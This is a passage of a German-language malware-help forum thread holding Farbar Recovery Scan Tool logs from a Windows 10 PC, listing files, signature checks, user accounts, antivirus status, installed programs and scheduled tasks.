- 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive 2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek 2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared 2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD 2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT 2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache 2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam 2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb 2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap 2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap 2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0 ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg 2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () 
C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-19 15:19

==================== Ende von FRST.txt ============================
21.05.2017, 20:26 | #8 |
| Trojan, adware or something else? Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (21-05-2017 21:24:27)
Gestartet von C:\Users\Dino\Desktop
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.)
Hidden Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.) AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft) ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft) Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft) ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.) ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios) Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender) Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender) Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.) Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.) Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.) Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.) Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.) 
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.) Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive) CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World) Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - ) ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen) EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft) Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation) JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH) Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - 
Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft) Mozilla 
Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla) Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.) Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek) Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games) Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts) Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.) 
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB) StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft) Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb) Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft) Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.) Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH) WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. 
Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
